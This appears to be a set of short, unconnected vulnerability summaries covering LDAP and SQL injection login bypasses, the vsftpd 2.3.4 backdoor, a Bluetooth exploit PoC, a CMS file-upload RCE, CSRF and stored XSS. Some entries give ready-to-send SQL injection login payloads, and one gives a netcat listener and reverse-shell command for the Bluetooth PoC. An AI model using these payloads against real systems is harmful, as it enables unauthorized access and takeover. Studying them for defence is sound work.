To exploit this flaw it is necessary to have at least one user/password previously registered, because the system checks (LDAP bind) the first user returned by the LDAP search, but returns the last user found in the search to the function that called it (logic error). So I call this problem an LDAP injection in conjunction with a programming logic error that allows you to authenticate to CITSmart ITSM as another valid user without needing to know the target user's password.
I found SQL injection in four login pages (Police Login page, Incharge Login page, User Login and HQ Login). The exploit is triggered by sending a maliciously crafted POST request to the vulnerable page with the payload 'email='or''='&password='or''='&s='. This payload allows the attacker to bypass authentication and gain access to the application.
ExpressVPN Router version 1 is vulnerable to an integer overflow in the Nginx range filter module, which can leak potentially sensitive information when triggered by a specially crafted request.
An authentication bypass vulnerability exists in Blitar Tourism 1.0. An attacker can exploit it by sending a crafted HTTP POST request with malicious SQL injection payloads in the username parameter, which allows the attacker to bypass authentication and gain access to the application.
A SQL injection vulnerability exists in Simple Student Information System 1.0, which allows an attacker to bypass authentication by entering 'or''=' as both the username and the password. This can be done by sending a POST request with the payload 'username='or''='&password='or''='&login=Log+In' to the index.php page.
A vulnerability in vsftpd 2.3.4 allows an attacker to gain remote code execution by sending a specially crafted USER command to the FTP server. When the server receives a USER command with the specially crafted argument, it executes arbitrary commands with root privileges.
This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352. Compile using gcc -o exploit exploit.c -lbluetooth and execute as sudo ./exploit target_mac source_ip source_port. In another terminal, run nc -lvp 1337 and, once a connection arrives, type exec bash -i 2>&0 1>&0. If successful, a calc can be spawned with export XAUTHORITY=/run/user/1000/gdm/Xauthority; export DISPLAY=:0; gnome-calculator. This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux. The success rate of the exploit is estimated at 80%.
An RCE in Composr CMS has been discovered by BugsBD Private LTD. There is a security issue in galleries which allows us to upload a PHP file. Whenever we upload an image from galleries, Composr allows us to upload only images; if we try to upload a PHP file from the galleries uploader, it says someone is attempting hacking activities. But there is a security issue in the Upload In Bulk section. Whenever we check the allowed extensions in the Upload In Bulk function, we can see PHP is completely prohibited. But whenever we tamper with the request and change the extension, we can see it uploads the PHP file without any other or server-side verification. This allows a user to upload a malicious file even though it is restricted.
DMA Radius Manager 4.4.0 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can craft a malicious HTML page containing a form with malicious parameters that submits to the vulnerable application. This can be used to create a new user with administrative privileges. This vulnerability is tracked as CVE-2021-30147.
CMSimple 5.2 allows stored XSS via the Settings > CMS > Filebrowser > 'External:' input field. The CMSimple 'Filebrowser' 'External:' input field does not filter special characters, so it is possible to place JavaScript code there. The JavaScript code placed here is executed by clicking on the Page or Files tab.